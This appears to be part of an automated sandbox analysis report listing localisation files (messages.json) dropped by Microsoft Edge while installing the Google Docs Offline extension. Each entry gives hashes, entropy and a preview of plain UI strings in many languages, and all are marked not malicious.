                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):848
                                                                                                                                                                Entropy (8bit):4.494568170878587
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1425
                                                                                                                                                                Entropy (8bit):4.461560329690825
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):961
                                                                                                                                                                Entropy (8bit):4.537633413451255
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):959
                                                                                                                                                                Entropy (8bit):4.570019855018913
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):968
                                                                                                                                                                Entropy (8bit):4.633956349931516
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):838
                                                                                                                                                                Entropy (8bit):4.4975520913636595
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1305
                                                                                                                                                                Entropy (8bit):4.673517697192589
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):911
                                                                                                                                                                Entropy (8bit):4.6294343834070935
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):939
                                                                                                                                                                Entropy (8bit):4.451724169062555
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):977
                                                                                                                                                                Entropy (8bit):4.622066056638277
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):972
                                                                                                                                                                Entropy (8bit):4.621319511196614
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):990
                                                                                                                                                                Entropy (8bit):4.497202347098541
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                Entropy (8bit):4.294833932445159
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1672
                                                                                                                                                                Entropy (8bit):4.314484457325167
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):935
                                                                                                                                                                Entropy (8bit):4.6369398601609735
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                Entropy (8bit):4.816501737523951
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                Malicious:false
